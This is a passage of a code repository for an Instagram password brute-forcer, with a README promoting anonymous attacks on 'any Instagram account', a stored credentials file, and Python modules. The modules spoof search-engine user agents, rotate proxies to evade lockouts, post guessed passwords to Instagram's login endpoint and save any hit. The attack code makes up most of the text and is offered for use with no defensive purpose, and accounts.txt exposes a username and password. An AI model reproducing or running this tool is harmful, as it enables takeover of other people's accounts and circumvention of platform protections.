10 | 11 | This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden. 12 | 13 | # NOTICE 14 | 15 | This project is no longer maintained; use version 3.0.0 at [here](https://github.com/Pure-L0G1C/Insta) 16 | 17 | ### Requirements 18 | 19 | - Python _v3.x.x_ 20 | - ~~Kali Linux 2.0~~ 21 | - ~~TOR~~ 22 | 23 | ### Install Dependencies 24 | 25 | ``` 26 | pip3 install -r requirements.txt 27 | ``` 28 | 29 | ### Help 30 | 31 | ``` 32 | C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h 33 | usage: instagram.py [-h] [-m MODE] username wordlist 34 | 35 | positional arguments: 36 | username email or username 37 | wordlist password list 38 | 39 | optional arguments: 40 | -h, --help show this help message and exit 41 | -m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots 42 | ``` 43 | 44 | ### Usage 45 | 46 | ``` 47 | python3 instagram.py -m 48 | ``` 49 | 50 | ### Bots(Threads) 51 | 52 | - 4 bots: 64 passwords at a time 53 | - 8 bots: 128 passwords at a time 54 | - 16 bots: 256 passwords at a time 55 | - 32 bots: 512 passwords at a time 56 | 57 | ### Modes 58 | 59 | - 0: 32 bots 60 | - 1: 16 bots 61 | - 2: 8 bots 62 | - 3: 4 bots 63 | 64 | ### Chill mode 65 | 66 | This mode uses only 4 bots, or 64 passwords at a time. 67 | 68 | ``` 69 | C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3 70 | ``` 71 | 72 | ### Moderate mode 1 73 | 74 | This mode uses 8 bots, or 128 passwords at a time. 75 | 76 | ``` 77 | C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2 78 | ``` 79 | 80 | ### Moderate mode 2 81 | 82 | This mode uses 16 bots, or 256 passwords at a time. 83 | 84 | ``` 85 | C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1 86 | ``` 87 | 88 | ### Savage mode 89 | 90 | This mode uses 32 bots, or 512 passwords at a time. 91 | 92 | ``` 93 | C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0 94 | ``` 95 | 96 | ### If you don't specify a mode, then mode is set to 2 97 | 98 | ### Run 99 | 100 | ``` 101 | [-] Wordlist: pass.lst 102 | [-] Username: Sami09.1 103 | [-] Password: 272 104 | [-] Complete: 45.51% 105 | [-] Attempts: 228 106 | [-] Browsers: 273 107 | [-] Exists: True 108 | ``` 109 | 110 | ### Stop 111 | 112 | ``` 113 | [-] Wordlist: pass.lst 114 | [-] Username: Sami09.1 115 | [-] Password: Sami123 116 | [-] Complete: 62.67% 117 | [-] Attempts: 314 118 | [-] Browsers: 185 119 | [-] Exists: True 120 | 121 | [!] Password Found 122 | [+] Username: Sami09.1 123 | [+] Password: Sami123 124 | ``` 125 | -------------------------------------------------------------------------------- /files/Instagram/accounts.txt: -------------------------------------------------------------------------------- 1 | Username: Tuf_Unkn0Wn 2 | Password: 1NST4gr4mUN_KN0WNbaliP4SS 3 | 4 | Username: Tuf_Unkn0Wn 5 | Password: 1NST4gr4mUN_KN0WNbaliP4SS 6 | 7 | -------------------------------------------------------------------------------- /files/Instagram/database/session.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/database/session.db -------------------------------------------------------------------------------- /files/Instagram/instagram.py: -------------------------------------------------------------------------------- 1 | # Date: 12/29/2018 2 | # Author: Mohamed 3 | # Description: Instagram bruter 4 | 5 | from sys import exit 6 | from os.path import exists 7 | from lib.bruter import Bruter 8 | from lib.display import Display 9 | from platform import python_version 10 | from lib.const import credentials, modes 11 | from argparse import ArgumentParser, ArgumentTypeError 12 | 13 | 14 | class Engine(object): 15 | 16 | def __init__(self, username, threads, passlist_path, is_color): 17 | self.bruter = None 18 | self.resume = False 19 | self.is_alive = True 20 | self.threads = threads 21 | self.username = username 22 | self.passlist_path = passlist_path 23 | self.display = Display(is_color=is_color) 24 | 25 | def passlist_path_exists(self): 26 | if not exists(self.passlist_path): 27 | self.display.warning('Invalid path to password list') 28 | return False 29 | return True 30 | 31 | def create_bruter(self): 32 | self.bruter = Bruter( 33 | self.username, 34 | self.threads, 35 | self.passlist_path 36 | ) 37 | 38 | def get_user_resp(self): 39 | return self.display.prompt('Would you like to resume the attack? [y/n]: ') 40 | 41 | def write_to_file(self, password): 42 | with open(credentials, 'at') as f: 43 | data = 'Username: {}\nPassword: {}\n\n'.format( 44 | self.username.title(), password) 45 | f.write(data) 46 | 47 | def start(self): 48 | if not self.passlist_path_exists(): 49 | self.is_alive = False 50 | 51 | if self.is_alive: 52 | self.create_bruter() 53 | 54 | while self.is_alive and not self.bruter.password_manager.session: 55 | pass 56 | 57 | if not self.is_alive: 58 | return 59 | 60 | if self.bruter.password_manager.session.exists: 61 | try: 62 | resp = self.get_user_resp() 63 | except: 64 | self.is_alive = False 65 | 66 | if resp and self.is_alive: 67 | if resp.strip().lower() == 'y': 68 | self.bruter.password_manager.resume = True 69 | 70 | try: 71 | self.bruter.start() 72 | except KeyboardInterrupt: 73 | self.bruter.stop() 74 | self.bruter.display.shutdown(self.bruter.last_password, 75 | self.bruter.password_manager.attempts, len(self.bruter.browsers)) 76 | finally: 77 | self.stop() 78 | 79 | def stop(self): 80 | if self.is_alive: 81 | 82 | self.bruter.stop() 83 | self.is_alive = False 84 | 85 | if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: 86 | self.bruter.display.stats_not_found(self.bruter.last_password, 87 | self.bruter.password_manager.attempts, len(self.bruter.browsers)) 88 | 89 | if self.bruter.is_found: 90 | self.write_to_file(self.bruter.password) 91 | self.bruter.display.stats_found(self.bruter.password, 92 | self.bruter.password_manager.attempts, len(self.bruter.browsers)) 93 | 94 | 95 | def valid_int(n): 96 | if not n.isdigit(): 97 | raise ArgumentTypeError('mode must be a number') 98 | 99 | n = int(n) 100 | 101 | if n > 3: 102 | raise ArgumentTypeError('maximum for a mode is 3') 103 | 104 | if n < 0: 105 | raise ArgumentTypeError('minimum for a mode is 0') 106 | 107 | return n 108 | 109 | 110 | def args(): 111 | args = ArgumentParser() 112 | args.add_argument('username', help='email or username') 113 | args.add_argument('passlist', help='password list') 114 | args.add_argument('-nc', '--no-color', dest='color', 115 | action='store_true', help='disable colors') 116 | args.add_argument('-m', '--mode', default=2, type=valid_int, 117 | help='modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots') 118 | return args.parse_args() 119 | 120 | 121 | if __name__ == '__main__': 122 | 123 | if int(python_version()[0]) < 3: 124 | print('[!] Please use Python 3') 125 | exit() 126 | 127 | arugments = args() 128 | mode = arugments.mode 129 | username = arugments.username 130 | passlist = arugments.passlist 131 | is_color = True if not arugments.color else False 132 | Engine(username, modes[mode], passlist, is_color).start() 133 | -------------------------------------------------------------------------------- /files/Instagram/lib/__init__.py: -------------------------------------------------------------------------------- 1 | # Date: 12/30/2018 2 | # Author: Mohamed 3 | -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/bad_proxies.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/bad_proxies.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/browser.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/browser.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/bruter.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/bruter.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/const.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/const.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/display.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/display.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/password_manager.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/password_manager.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/proxy.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/proxy.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/proxy_list.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/proxy_list.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/proxy_manager.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/proxy_manager.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/scraper.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/scraper.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/__pycache__/session.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/Instagram/lib/__pycache__/session.cpython-37.pyc -------------------------------------------------------------------------------- /files/Instagram/lib/bad_proxies.py: -------------------------------------------------------------------------------- 1 | # Date: 12/29/2018 2 | # Author: Mohamed 3 | # Description: Manages bad proxies 4 | 5 | from .const import max_bad_proxies 6 | 7 | 8 | class BadProxies(object): 9 | 10 | def __init__(self): 11 | self.proxies = [] 12 | 13 | def __contains__(self, proxy): 14 | for _proxy in self.proxies: 15 | if _proxy.ip == proxy.ip and _proxy.port == proxy.port: 16 | return True 17 | return False 18 | 19 | def append(self, proxy): 20 | if len(self.proxies) >= max_bad_proxies: 21 | self.proxies.pop(0) 22 | 23 | self.proxies.append(proxy) 24 | 25 | -------------------------------------------------------------------------------- /files/Instagram/lib/browser.py: -------------------------------------------------------------------------------- 1 | # Date: 12/28/2018 2 | # Author: Mohamed 3 | # Description: Browser 4 | 5 | from time import time 6 | from random import choice 7 | from requests import Session 8 | from .const import browser_data, response_codes, fetch_time, user_agents, debug 9 | 10 | 11 | class Browser(object): 12 | 13 | account_exists = None 14 | 15 | def __init__(self, username, password, proxy): 16 | self.proxy = proxy 17 | self.is_found = False 18 | self.is_active = True 19 | self.is_locked = False 20 | self.start_time = None 21 | self.browser = self.br() 22 | self.username = username 23 | self.password = password 24 | self.is_attempted = False 25 | 26 | def br(self): 27 | header = browser_data['header'] 28 | header['user-agent'] = choice(user_agents) 29 | 30 | session = Session() 31 | session.headers.update(header) 32 | session.proxies.update(self.proxy.addr) 33 | return session 34 | 35 | def get_token(self): 36 | token = None 37 | try: 38 | token = self.browser.get( 39 | browser_data['home_url'], timeout=fetch_time).cookies.get_dict()['csrftoken'] 40 | 41 | self.browser.headers.update({ 42 | 'cookie': 'mid=XLzTtAALAAEb-Sz-JUGbyLphzGmc; csrftoken={}; rur={}'.format( 43 | token, self.browser.cookies.get_dict()['rur'] 44 | ) 45 | }) 46 | except: 47 | pass 48 | finally: 49 | return token 50 | 51 | def post_data(self): 52 | response = None 53 | data = {browser_data['username_field']: self.username, 54 | browser_data['password_field']: self.password} 55 | 56 | try: 57 | response = self.browser.post( 58 | browser_data['login_url'], data=data, timeout=fetch_time).json() 59 | except: 60 | pass 61 | finally: 62 | return response 63 | 64 | def check_exists(self, response): 65 | if 'user' in response: 66 | Browser.account_exists = response['user'] 67 | 68 | def check_response(self, response): 69 | if 'authenticated' in response: 70 | if response['authenticated']: 71 | return response_codes['succeed'] 72 | 73 | if 'message' in response: 74 | if response['message'] == 'checkpoint_required': 75 | return response_codes['succeed'] 76 | 77 | if response['status'] == 'fail': 78 | return response_codes['locked'] 79 | 80 | if 'errors' in response: 81 | return response_codes['locked'] 82 | 83 | return response_codes['failed'] 84 | 85 | def authenicate(self): 86 | response = self.post_data() 87 | resp = {'attempted': False, 'accessed': False, 'locked': False} 88 | 89 | if debug: 90 | print('pass: {} => {}'.format(self.password, response)) 91 | 92 | if response: 93 | resp['attempted'] = True 94 | resp_code = self.check_response(response) 95 | 96 | if resp_code == response_codes['locked']: 97 | resp['locked'] = True 98 | 99 | if resp_code == response_codes['succeed']: 100 | resp['accessed'] = True 101 | 102 | if Browser.account_exists == None: 103 | self.check_exists(response) 104 | 105 | return resp 106 | 107 | def attempt(self): 108 | self.start_time = time() 109 | token = self.get_token() 110 | 111 | if token: 112 | self.browser.headers.update({'x-csrftoken': token}) 113 | resp = self.authenicate() 114 | 115 | if resp['attempted']: 116 | self.is_attempted = True 117 | 118 | if not resp['locked']: 119 | if resp['accessed']: 120 | self.is_found = True 121 | else: 122 | self.is_locked = True 123 | self.close() 124 | 125 | def close(self): 126 | self.browser.close() 127 | self.is_active = False 128 | -------------------------------------------------------------------------------- /files/Instagram/lib/bruter.py: -------------------------------------------------------------------------------- 1 | # Date: 12/28/2018 2 | # Author: Mohamed 3 | # Description: Bruter 4 | 5 | from time import time, sleep 6 | from lib.browser import Browser 7 | from lib.display import Display 8 | from threading import Thread, RLock 9 | from lib.proxy_manager import ProxyManager 10 | from lib.password_manager import PasswordManager 11 | from lib.const import max_time_to_wait, max_bots_per_proxy 12 | 13 | 14 | class Bruter(object): 15 | 16 | def __init__(self, username, threads, passlist_path): 17 | self.browsers = [] 18 | self.lock = RLock() 19 | self.password = None 20 | self.is_alive = True 21 | self.is_found = False 22 | self.bots_per_proxy = 0 23 | self.username = username 24 | self.last_password = None 25 | self.active_passwords = [] 26 | self.proxy_manager = ProxyManager() 27 | self.display = Display(username, passlist_path) 28 | self.password_manager = PasswordManager(username, 29 | passlist_path, threads, self.display) 30 | 31 | def manage_session(self): 32 | if self.password_manager.is_read: 33 | if not self.password_manager.list_size or self.is_found: 34 | self.password_manager.session.delete() 35 | else: 36 | if self.is_found: 37 | self.password_manager.session.delete() 38 | else: 39 | self.password_manager.session.write(self.password_manager.attempts, 40 | self.password_manager.passlist) 41 | 42 | def browser_manager(self): 43 | while self.is_alive: 44 | 45 | for browser in self.browsers: 46 | 47 | if not self.is_alive: 48 | break 49 | 50 | if Display.account_exists == None and Browser.account_exists != None: 51 | Display.account_exists = Browser.account_exists 52 | 53 | if not browser.is_active: 54 | 55 | password = browser.password 56 | 57 | if browser.is_attempted and not browser.is_locked: 58 | 59 | if browser.is_found and not self.is_found: 60 | self.password = password 61 | self.is_found = True 62 | 63 | with self.lock: 64 | self.password_manager.list_remove(password) 65 | else: 66 | with self.lock: 67 | self.proxy_manager.bad_proxy(browser.proxy) 68 | 69 | self.remove_browser(browser) 70 | 71 | else: 72 | if browser.start_time: 73 | if time() - browser.start_time >= max_time_to_wait: 74 | browser.close() 75 | 76 | def remove_browser(self, browser): 77 | if browser in self.browsers: 78 | with self.lock: 79 | self.browsers.pop(self.browsers.index(browser)) 80 | self.active_passwords.pop( 81 | self.active_passwords.index(browser.password) 82 | ) 83 | 84 | def attack(self): 85 | proxy = None 86 | is_attack_started = False 87 | while self.is_alive: 88 | 89 | browsers = [] 90 | for password in self.password_manager.passlist: 91 | 92 | if not self.is_alive: 93 | break 94 | 95 | if not proxy: 96 | proxy = self.proxy_manager.get_proxy() 97 | self.bots_per_proxy = 0 98 | 99 | if self.bots_per_proxy >= max_bots_per_proxy: 100 | proxy = None 101 | 102 | if not proxy: 103 | continue 104 | 105 | if not password in self.active_passwords and password in self.password_manager.passlist: 106 | browser = Browser(self.username, password, proxy) 107 | browsers.append(browser) 108 | self.bots_per_proxy += 1 109 | 110 | if not is_attack_started: 111 | self.display.info('Starting attack ...') 112 | is_attack_started = True 113 | 114 | with self.lock: 115 | self.browsers.append(browser) 116 | self.active_passwords.append(password) 117 | 118 | for browser in browsers: 119 | thread = Thread(target=browser.attempt) 120 | thread.daemon = True 121 | try: 122 | thread.start() 123 | except: 124 | self.remove_browser(browser) 125 | 126 | def start_daemon_threads(self): 127 | attack = Thread(target=self.attack) 128 | browser_manager = Thread(target=self.browser_manager) 129 | proxy_manager = Thread(target=self.proxy_manager.start) 130 | password_manager = Thread(target=self.password_manager.start) 131 | 132 | attack.daemon = True 133 | proxy_manager.daemon = True 134 | browser_manager.daemon = True 135 | password_manager.daemon = True 136 | 137 | attack.start() 138 | proxy_manager.start() 139 | browser_manager.start() 140 | password_manager.start() 141 | 142 | self.display.info('Searching for proxies ...') 143 | 144 | def stop_daemon_threads(self): 145 | self.proxy_manager.stop() 146 | self.password_manager.stop() 147 | 148 | def start(self): 149 | self.display.info('Initiating daemon threads ...') 150 | self.start_daemon_threads() 151 | 152 | last_attempt = 0 153 | while self.is_alive and not self.is_found: 154 | 155 | if last_attempt == self.password_manager.attempts and self.password_manager.attempts: 156 | sleep(1.5) 157 | continue 158 | 159 | for browser in self.browsers: 160 | 161 | self.display.stats( 162 | browser.password, self.password_manager.attempts, len(self.browsers)) 163 | last_attempt = self.password_manager.attempts 164 | self.last_password = browser.password 165 | 166 | if not self.is_alive or self.is_found: 167 | break 168 | 169 | if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers): 170 | self.is_alive = False 171 | 172 | def stop(self): 173 | self.is_alive = False 174 | self.manage_session() 175 | self.stop_daemon_threads() 176 | self.password_manager.session.is_busy = False 177 | -------------------------------------------------------------------------------- /files/Instagram/lib/const.py: -------------------------------------------------------------------------------- 1 | # Date: 12/28/2018 2 | # Author: Mohamed 3 | # Description: Constants 4 | 5 | import os 6 | 7 | # User agents 8 | user_agents = [ 9 | 'Googlebot/2.1 (+http://www.google.com/bot.html)', 10 | 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 11 | 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 12 | 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36', 13 | 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 14 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 15 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 16 | 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 17 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 18 | 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 19 | 20 | 21 | 'Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', 22 | 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 23 | 'Mozilla/5.0 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', 24 | 'Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', 25 | 'Mozilla/5.0 (seoanalyzer; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 26 | 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) SitemapProbe', 27 | 'Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', 28 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', 29 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', 30 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', 31 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 32 | ] 33 | 34 | # Browser 35 | header = { 36 | 'x-ig-app-id': '936619743392459', 37 | 'x-instagram-ajax': '2f6bf8b37c04', 38 | 'x-requested-with': 'XMLHttpRequest', 39 | 'referer': 'https://www.instagram.com/', 40 | 'content-type': 'application/x-www-form-urlencoded' 41 | } 42 | 43 | username_field = 'username' 44 | password_field = 'password' 45 | home_url = 'https://www.instagram.com/' 46 | login_url = 'https://www.instagram.com/accounts/login/ajax/' 47 | 48 | browser_data = { 49 | 'header': header, 50 | 'home_url': home_url, 51 | 'login_url': login_url, 52 | 'username_field': username_field, 53 | 'password_field': password_field 54 | } 55 | 56 | # Login 57 | fetch_time = (10, 15) 58 | response_codes = {'succeed': 0, 'failed': 1, 'locked': -1} 59 | 60 | # Limits 61 | max_bad_proxies = 128 62 | max_time_to_wait = 18 63 | max_bots_per_proxy = 16 64 | 65 | # Misc 66 | debug = False 67 | credentials = 'accounts.txt' 68 | modes = {0: 512, 1: 256, 2: 128, 3: 64} 69 | 70 | # Database 71 | db_dir = 'database' 72 | db_session = 'session.db' 73 | db_path = os.path.join(db_dir, db_session) 74 | 75 | if not os.path.exists(db_dir): 76 | os.mkdir(db_dir) 77 | -------------------------------------------------------------------------------- /files/Instagram/lib/display.py: -------------------------------------------------------------------------------- 1 | # 12/29/2018 2 | # Author: Mohamed 3 | # Description: Display 4 | 5 | from os import system 6 | from time import sleep 7 | from .const import debug 8 | from colorama import Fore 9 | from builtins import input 10 | from platform import system as platform 11 | 12 | 13 | class Display(object): 14 | 15 | __is_color = None 16 | total_lines = None 17 | account_exists = None 18 | 19 | def __init__(self, username=None, passlist=None, is_color=None): 20 | self.delay = 1.3 21 | self.username = username 22 | self.passlist = passlist 23 | self.colors_disabled = True 24 | self.cls = 'cls' if platform() == 'Windows' else 'clear' 25 | 26 | if Display.__is_color == None: 27 | Display.__is_color = is_color 28 | 29 | def clear(self): 30 | if not debug or self.colors_disabled: 31 | system(self.cls) 32 | 33 | if self.colors_disabled and self.__is_color: 34 | self.colors_disabled = False 35 | else: 36 | print('\n\n') 37 | 38 | def stats(self, password, attempts, browsers, load=True): 39 | self.clear() 40 | complete = round((attempts/Display.total_lines) * 100, 4) 41 | account_exists = self.account_exists if self.account_exists != None else '' 42 | 43 | if self.__is_color: 44 | print('{0}[{1}-{0}] {1}Wordlist: {2}{3}{4}'.format( 45 | Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.passlist, Fore.RESET 46 | )) 47 | 48 | print('{0}[{1}-{0}] {1}Username: {2}{3}{4}'.format( 49 | Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.username.title(), Fore.RESET 50 | )) 51 | 52 | print('{0}[{1}-{0}] {1}Password: {2}{3}{4}'.format( 53 | Fore.YELLOW, Fore.WHITE, Fore.CYAN, password, Fore.RESET 54 | )) 55 | 56 | print('{0}[{1}-{0}] {1}Complete: {2}{3}%{4}'.format( 57 | Fore.YELLOW, Fore.WHITE, Fore.CYAN, complete, Fore.RESET 58 | )) 59 | 60 | print('{0}[{1}-{0}] {1}Attempts: {2}{3}{4}'.format( 61 | Fore.YELLOW, Fore.WHITE, Fore.CYAN, attempts, Fore.RESET 62 | )) 63 | 64 | print('{0}[{1}-{0}] {1}Browsers: {2}{3}{4}'.format( 65 | Fore.YELLOW, Fore.WHITE, Fore.CYAN, browsers, Fore.RESET 66 | )) 67 | 68 | print('{0}[{1}-{0}] {1}Exists: {2}{3}{4}'.format( 69 | Fore.YELLOW, Fore.WHITE, Fore.CYAN, account_exists, Fore.RESET 70 | )) 71 | 72 | else: 73 | print( 74 | f'[-] Wordlist: {self.passlist}\n[-] Username: {self.username}\n[-] Password: {password}') 75 | 76 | print( 77 | f'Complete: {complete}\n[-] Attempts: {attempts}\n[-] Browsers: {browsers}\n[-] Exists: {account_exists}') 78 | 79 | if load: 80 | sleep(self.delay) 81 | 82 | def stats_found(self, password, attempts, browsers): 83 | self.stats(password, attempts, browsers, load=False) 84 | 85 | if self.__is_color: 86 | print('\n{0}[{1}!{0}] {2}Password Found{3}'.format( 87 | Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET 88 | )) 89 | 90 | print('{0}[{1}+{0}] {2}Username: {1}{3}{4}'.format( 91 | Fore.YELLOW, Fore.GREEN, Fore.WHITE, self.username.title(), Fore.RESET 92 | )) 93 | 94 | print('{0}[{1}+{0}] {2}Password: {1}{3}{4}'.format( 95 | Fore.YELLOW, Fore.GREEN, Fore.WHITE, password, Fore.RESET 96 | )) 97 | else: 98 | print('\n[!] Password Found\n[+] Username: {}\n[+] Password: {}'.format( 99 | self.username.title(), password 100 | )) 101 | 102 | sleep(self.delay) 103 | 104 | def stats_not_found(self, password, attempts, browsers): 105 | self.stats(password, attempts, browsers, load=False) 106 | 107 | if self.__is_color: 108 | print('\n{0}[{1}!{0}] {2}Password Not Found{3}'.format( 109 | Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET 110 | )) 111 | else: 112 | print('\n[!] Password Not Found') 113 | 114 | sleep(self.delay) 115 | 116 | def shutdown(self, password, attempts, browsers): 117 | self.stats(password, attempts, browsers, load=False) 118 | 119 | if self.__is_color: 120 | print('\n{0}[{1}!{0}] {2}Shutting Down ...{3}'.format( 121 | Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET 122 | )) 123 | else: 124 | print('\n[!] Shutting Down ...') 125 | 126 | sleep(self.delay) 127 | 128 | def info(self, msg): 129 | self.clear() 130 | 131 | if self.__is_color: 132 | print('{0}[{1}i{0}] {2}{3}{4}'.format( 133 | Fore.YELLOW, Fore.CYAN, Fore.WHITE, msg, Fore.RESET 134 | )) 135 | else: 136 | print('[i] {}'.format(msg)) 137 | 138 | sleep(2.5) 139 | 140 | def warning(self, msg): 141 | self.clear() 142 | 143 | if self.__is_color: 144 | print('{0}[{1}!{0}] {1}{2}{3}'.format( 145 | Fore.YELLOW, Fore.RED, msg, Fore.RESET 146 | )) 147 | else: 148 | print('[!] {}'.format(msg)) 149 | 150 | sleep(self.delay) 151 | 152 | def prompt(self, data): 153 | self.clear() 154 | 155 | if self.__is_color: 156 | return input('{0}[{1}?{0}] {2}{3}{4}'.format( 157 | Fore.YELLOW, Fore.CYAN, Fore.WHITE, data, Fore.RESET 158 | )) 159 | else: 160 | return input('[?] {}'.format(data)) 161 | -------------------------------------------------------------------------------- /files/Instagram/lib/password_manager.py: -------------------------------------------------------------------------------- 1 | # Date: 12/28/2018 2 | # Author: Mohamed 3 | # Description: Password manager 4 | 5 | from time import sleep 6 | from hashlib import sha256 7 | from sys import version_info 8 | from lib.display import Display 9 | from lib.session import Session 10 | 11 | 12 | class PasswordManager(object): 13 | 14 | def __init__(self, username, passlist_path, max_passwords, display): 15 | self.passlist = [] 16 | self.session = None 17 | self.resume = False 18 | self.is_alive = True 19 | self.is_read = False 20 | self.display = display 21 | self.fingerprint = None 22 | self.username = username 23 | self.passwords_removed = 0 24 | self.passlist_path = passlist_path 25 | self.max_passwords = max_passwords 26 | Display.total_lines = self.count_lines() 27 | 28 